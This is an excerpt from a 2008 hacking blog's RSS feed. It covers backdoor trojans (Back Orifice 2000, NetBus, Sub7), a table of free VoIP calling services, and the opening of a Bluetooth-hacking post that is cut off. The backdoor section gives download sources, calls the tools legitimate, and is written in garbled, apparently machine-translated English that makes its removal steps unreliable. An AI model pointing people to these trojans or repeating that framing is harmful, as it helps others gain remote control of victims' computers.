<p style="text-align: justify;">Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/</p>
<p style="text-align: justify;"><strong>I infected! How do I remove it?</strong></p>
<p style="text-align: justify;">Removing Back Orifice 2000 may require that you change the registry settings. To remove it at 7 simple steps, refer to the diagram below.</p>
<p style="text-align: justify;"><strong>How do I delete Back orifice 2000</strong></p>
<ol>
<li> Click Start&gt; Run, and type &#8220;Regedit&#8221;(without the quotes)</li>
<li> Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices &#8220;</li>
<li> Now looking in the right box: &#8220;The umgr32 = &#8216;c: \ windows \ system \ umgr32.exe&#8221;</li>
<li>Right-click on this entry and click Remove. Now restart your computer.</li>
<li>After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select &#8220;View Options and configure the appropriate settings.</li>
<li>Go to the WINDOWS \ SYSTEM directory, and find &#8220;umgr32.exe&#8221; file. Once you find it, delete it.</li>
<li>Exit Windows Explorer and reboot again.</li>
</ol>
<p style="text-align: justify;"><strong>NetBus / Netbus 2.0 Pro</strong></p>
<p style="text-align: justify;">NetBus was established around the same time that the Back Orifice was in the late 1990&#8242;s. NetBus was originally designed as a program prank friends and family, of course anything too malicious. However, the program was released in 1998, and is widely used as a backdoor to manage computer.</p>
<p style="text-align: justify;">Like the Back Orifice, NetBus allows attackers to do virtually everything in the computer victim. It also works well under Windows 9x systems, as well as Windows XP. Unlike Back Orifice, the latest version of NetBus regarded shareware is not free. NetBus is also implementing less stealthy operations, as a direct result of criticism and complaints of abusive use.</p>
<p style="text-align: justify;"><strong>Where can I buy and download NetBus?</strong></p>
<p style="text-align: justify;">NetBus can be purchased and downloaded at the following address: http://www.netbus.org/</p>
<p style="text-align: justify;"><strong>Ok, I am infected. Now what?</strong></p>
<p style="text-align: justify;">Fortunately, the latest version of NetBus is a valid program. It can be removed just like any other program. Previous issuance NetBus is a bit more tricky, however. If you are not lucky enough attacked with the latest version, the withdrawal process and in the Back Orifice.</p>
<p style="text-align: justify;"><strong>How do I remove NetBus?</strong></p>
<ol style="text-align: left;">
<li> Click Start&gt; Run, and type &#8220;Regedit &#8216;(without the quotes)</li>
<li style="text-align: left;">Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices &#8220;</li>
<li>Now, in the right box, looking as follows: &#8220;[Name_of_Server].&#8221;Exe Of course, you have to find the actual name of this file EXE-. Usually This&#8221; Patch.exe &#8216;or&#8217; SysEdit.exe &#8220;, but may vary.</li>
<li>Reboot and remove all traces of the actual program, which can be left. Additionally, you can set yourself NetBus, and then use its own function disposal.</li>
</ol>
<p style="text-align: left;"><strong>SubSeven / Sub7</strong></p>
<p style="text-align: justify;">SubSeven or Sub7, has been established for the same purpose was to NetBus pranks. Sub7 actually has more support for pranks, and has more advanced users. Sub7 also widely used by the script kiddies, although that many firewalls and anti-virus software before initialization.</p>
<p style="text-align: justify;">Since Sub7 not supported for several years, the threat is usually very low. Most security programs will not have any problem in ending Sub7 before it has a chance to be started. This shows that the importance to the modernization and security programs is critical, because the money was still there.</p>
<p style="text-align: justify;">Nevertheless, it is widely used by those who have physical access to your firewall, or security programs. If access rights, the tool will work without restrictions.</p>
<p style="text-align: left;"><strong>Where can I buy and download Sub7?</strong></p>
<p style="text-align: justify;">Sub7 not supported more, and hence is not available for download on any legitimate websites. If you were to make a Google search, you would find links to download Sub7. However, this is not the official site, and should be considered dubious and dangerous.</p>
<p style="text-align: left;"><strong>Sounds harmless, How do I remove it?</strong></p>
<ol>
<li>End of the following processes through the curator: &#8220;editserver.exe, subseven.exe&#8221;</li>
<li>Delete the following files: &#8220;editserver.exe, subseven.exe, tutorial.txt.&#8221;</li>
</ol>
<p style="text-align: left;"><strong>Why these programs is absolutely legitimate?</strong></p>
<p style="text-align: justify;">All the basis behind these programs is that they are designed to help people, not harm. While some like NetBus really were originally created for pranks, they switched routes to avoid legal problems.</p>
<p style="text-align: justify;">These programs claim to be the legitimate remote desktop program, although they certainly easily used for malicious use. These programs really should be used to aid or customer support departments. Why all adolescents is to copy these programs goes beyond us, but leave the content of their networks, while computer is a good idea.</p>
<p style="text-align: justify;">The advent of new technology has made these programs in some respects less effective. However, programs such as Back Orifice 2000, yet still evolving, so do not be surprised to learn that he works in the background, waiting for instructions. Since the best defense is a good offense, be sure to save a sharp eye on what is installed on the network computers. After all, an ounce of prevention is worth a pound of cure.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=353&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/09/three-most-used-backdoor-programs.html/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Make FREE Calls to Landline and Mobile phones</title>
		<link>http://www.hungry-hackers.com/2008/09/make-free-calls-to-landline-and-mobile.html</link>
		<comments>http://www.hungry-hackers.com/2008/09/make-free-calls-to-landline-and-mobile.html#comments</comments>
		<pubDate>Sat, 20 Sep 2008 17:34:46 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Mobile Hacking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Spoofing]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Free Calls]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Landline]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[Softwares]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Tricks]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=351</guid>
		<description><![CDATA[

Gizmo Call
Make FREE calls quickly
Simply type gizmocall.com/18005551212 into your browsers address bar.
(put the number you want to dial in place of 18005551212)
Make FREE calls to landline and mobile phones in over 60 countries by participating in the All Calls Free plan.
Users NEW to the All Calls Free plan get 20 minutes of free calling simply by getting ONE friend to sign up for a new Gizmo account. There are no commitments and no hidden fees.

Get Started Now!

 Tell a friend to  										download Gizmo5 and have them add their phone ...]]></description>
			<content:encoded><![CDATA[<div>
<div>
<p><strong><a href="http://www.gizmocall.com/">Gizmo Call</a></strong></div>
<p>Make FREE calls quickly</p>
<p>Simply type <a href="http://gizmocall.com/18005551212">gizmocall.com/18005551212</a> into your browsers address bar.<br />
<small>(put the number you want to dial in place of 18005551212)</small></p>
<p><strong>Make FREE calls to landline and mobile phones in over 60 countries by participating in the </strong><strong>All Calls Free plan.</strong></p>
<p>Users NEW to the All Calls Free plan get 20 minutes of free calling simply by getting ONE friend to sign up for a new Gizmo account. There are no commitments and no hidden fees.</p>
<p><a name="gettingstarted"></a></p>
<h5>Get Started Now!</h5>
<ol style="margin: 20px 0pt 0pt; padding: 0pt 0pt 0pt 25px;">
<li class="ol"> <a href="http://gizmo5.com/pc/extras/tell-a-friend/">Tell a friend</a> to  										<a title="Download GizmoProject" href="http://gizmo5.com/pc/download/">download</a> Gizmo5 and have them add their phone number to their profile.<br />
<a title="Download GizmoProject" href="http://gizmo5.com/pc/download/"><img title="Free Calls" src="http://gizmo5.com/images/img-calls-1.jpg" border="0" alt="img-calls-1 Free Calls" vspace="10" /></a></li>
<li class="ol"> Add each other to your contact lists and you can call that person for FREE using Gizmo5.<br />
<img title="Free Calls" src="http://gizmo5.com/images/img-calls-3.jpg" border="0" alt="img-calls-3 Free Calls" vspace="10" /></li>
<li class="ol"> Be sure to make at least 1 Gizmo5 to Gizmo5 call per week or your free minutes will expire.<br />
<img title="Free Calls" src="http://gizmo5.com/images/img-calls-free-app.jpg" border="0" alt="img-calls-free-app Free Calls" vspace="15" /></li>
</ol>
</div>
<h2>
<ul>
<li>Download Softwares</li>
</ul>
</h2>
<table id="table9" border="0" cellspacing="4" width="100%">
<tbody>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center" bordercolor="#808080"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;">1</span></td>
<td width="150" align="center" bgcolor="#eaeaea" bordercolor="#808080"><strong> <span style="font-family: Arial; font-size: x-small;">poiv</span><span style="font-family: Arial; color: #ff6600; font-size: x-small;">Y</span></strong></td>
<td width="150" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.poivy.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.poivy.com/getfrommirror.php?file=poivY&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> Kuwait</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;">2</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #f1f1f1; font-size: x-small;"> <span style="background-color: #000099;"> VoipBuster </span></span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.voipbuster.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.voipbuster.com/getfrommirror.php?file=voipbuster&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> Thailand</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #eaeaea; font-size: xx-small;">3</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #ff9900; font-size: x-small;">VoipStunt</span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.voipstunt.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><a style="text-decoration: none; color: #8383b5;" href="http://www.voipstunt.com/getfrommirror.php?file=voipstunt&amp;lang=en"> <span style="font-family: Arial; color: #eaeaea; font-size: xx-small;"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></span></a></td>
<td width="270" align="left"><span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> <strong><span style="text-decoration: underline;">UK</span>, <span style="text-decoration: underline;">USA</span></strong></span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;">4</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #808080; font-size: x-small;"> InternetCalls</span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.internetcalls.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.internetcalls.com/getfrommirror.php?file=internetcalls&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> Egypt, Pakistan</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;">5</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #cc0066; font-size: x-small;"> InterVoip</span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.voipcheap.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.intervoip.com/getfrommirror.php?file=setupInterVoip&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> Iraq, 									Lebanon, Palestine, Qatar, Sudan</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;"> 6</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #f1f1f1; font-size: x-small;"> <span style="background-color: #33cc33;"> LowrateVoip </span></span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.lowratevoip.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.lowratevoip.com/getfrommirror.php?file=lowratevoip&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> Bangladesh,<strong> <span style="text-decoration: underline;">Jordan</span></strong>, Indonesia,   									Iraq, Malaysia Thailand, UK, USA</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;"> 7</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #ff9900; font-size: x-small;"> FreeCall</span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.freecall.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.freecall.com/getfrommirror.php?file=setupfreecall.exe&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="text-decoration: underline;"> <strong> <span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> Russia</span></strong></span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;"> 8</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #0000ff; font-size: x-small;"> SMSListo</span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.smslisto.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.smslisto.com/getfrommirror.php?file=SetupSMSListo.exe&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> Sudan, 									Syria, <span style="text-decoration: underline;"> <strong>China</strong></span></span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;"> 9</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #33cc33; font-size: x-small;"> WebCallDirect</span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.webcalldirect.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.webcalldirect.com/getfrommirror.php?file=setupwebcalldirect&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> India, Pakistan, Philippines, Malaysia</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;"> 1<span lang="ar-sy">0</span></span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #ff9966; font-size: x-small;"> Just</span><span style="font-family: Arial; color: #666666; font-size: x-small;">Voip</span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.justvoip.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.justvoip.com/getfrommirror.php?file=setupjustvoip.exe&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="text-decoration: underline;"> <strong> <span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> Russia</span></strong></span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;"> 11</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #ff9966; font-size: x-small;"> 1</span><span style="font-family: Arial; color: #0000ff; font-size: x-small;">2</span><span style="font-family: Arial; color: #666666; font-size: x-small;">Voip</span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.12voip.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.12voip.com/getfrommirror.php?file=setup12voip.exe&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> <span style="text-decoration: underline;"> <strong>Bahrain</strong></span>, <strong>China, </strong>Sri Lanka</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;"> 12</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong><span style="font-family: Arial; font-size: x-small;"> <span style="color: #0066ff;">Dial</span><span style="color: #ff9900;">Now</span></span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.dialnow.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><strong> <span style="font-family: Arial; color: #999999; font-size: x-small;">Phone-to-Phone</span></strong></td>
<td width="270" align="left"><span style="font-family: Arial; color: #999999; font-size: xx-small;"> Use if you live in a FREE Call Country!.</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;"> 13</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #ff0000; font-size: x-small;"> nonoh</span></strong></td>
<td width="148" align="center"><strong> <span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.nonoh.net/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><strong> <span style="font-family: Arial; color: #999999; font-size: x-small;">Phone-to-Phone</span></strong></td>
<td width="270" align="left"><span style="font-family: Arial; color: #999999; font-size: xx-small;"> Use if you live in a FREE Call Country!.</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;">14</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #cccc00; font-size: x-small;">VoipWise</span></strong></td>
<td width="148" align="center"><strong><span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.voipwise.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: x-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.voipwise.com/getfrommirror.php?file=setupVoipwise.exe"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;">15</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong><span style="font-family: Arial; font-size: x-small;"> <span style="color: #cc3300;">Budget</span><span style="color: #333333;">SIP</span></span></strong></td>
<td width="148" align="center"><strong><span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.budgetsip.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: x-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.budgetsip.com/getfrommirror.php?file=setupBudgetsip.exe"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="font-family: Arial; color: #808080; font-size: xx-small;"> We create your SIP account.</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;">16</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #666666; font-size: x-small;">Calleasy</span></strong></td>
<td width="148" align="center"><strong><span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="https://myaccount.calleasy.com/clx/tariffs.php" target="_blank">Rates</a></span></strong></td>
<td align="center"><strong> <span style="font-family: Arial; color: #999999; font-size: x-small;">Phone-to-Phone</span></strong></td>
<td width="270" align="left"><span style="font-family: Arial; color: #808080; font-size: xx-small;"> Web Call</span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;">17</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #ffffff; font-size: x-small;"> <span style="background-color: #0066ff;"> SIPDiscount </span></span></strong></td>
<td width="148" align="center"><strong><span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.sipdiscount.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; color: #999999; font-size: x-small;"> for 									<strong> SIP Devices</strong></span></td>
<td width="270" align="left"></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;">18</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #ffffff; font-size: x-small;"> <span style="background-color: #0000ff;"> SMSdiscount </span></span></strong></td>
<td width="148" align="center"><strong><span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.smsdiscount.com/en/calling-rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.smsdiscount.com/getfrommirror.php"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"><span style="font-family: Arial; color: #ff6600; font-size: xx-small;"> India, Morocco, 									<span style="text-decoration: underline;"><strong>Turkey</strong></span></span></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;">19</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #663300; font-size: x-small;">VoipCheap</span></strong></td>
<td width="148" align="center"><strong><span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.voipcheap.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.voipcheap.com/getfrommirror.php?file=voipcheapCOM&amp;lang=en"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"></td>
</tr>
<tr onmouseover="this.bgColor='#EAEAEA'" onmouseout="this.bgColor='#f1f1f1'" bgcolor="#f1f1f1">
<td width="26" align="center"><span style="font-family: Verdana; color: #8383b5; font-size: xx-small;"> 20</span></td>
<td width="141" align="center" bgcolor="#eaeaea"><strong> <span style="font-family: Arial; color: #0066cc; font-size: x-small;"> VoIP</span><span style="font-family: Arial; color: #808080; font-size: x-small;">Raider</span></strong></td>
<td width="148" align="center"><strong><span style="font-family: Verdana; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.voipraider.com/en/rates.html" target="_blank">Rates</a></span></strong></td>
<td align="center"><span style="font-family: Arial; font-size: xx-small;"> <a style="text-decoration: none; color: #8383b5;" href="http://www.voipraider.com/getfrommirror.php?file=setupVoipraider.exe"> <img title="Free Calls" src="http://www.kalemati.com/images/downloadnow.jpg" border="0" alt="downloadnow Free Calls" width="121" height="23" /></a></span></td>
<td width="270" align="left"></td>
</tr>
</tbody>
</table>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=351&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/09/make-free-calls-to-landline-and-mobile.html/feed</wfw:commentRss>
		<slash:comments>133</slash:comments>
		</item>
		<item>
		<title>Tools for Hacking Bluetooth Enabled Devices</title>
		<link>http://www.hungry-hackers.com/2008/09/tools-for-hacking-bluetooth-enabled-devices.html</link>
		<comments>http://www.hungry-hackers.com/2008/09/tools-for-hacking-bluetooth-enabled-devices.html#comments</comments>
		<pubDate>Sat, 06 Sep 2008 18:48:48 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Bluejacking]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Mobile Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Bluetooth]]></category>
		<category><![CDATA[Devices]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[Phones]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Vulnerablities]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=348</guid>
		<description><![CDATA[Bluetooth technology is great. No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).]]></description>
			<content:encoded><![CDATA[<div style="text-align: justify;">
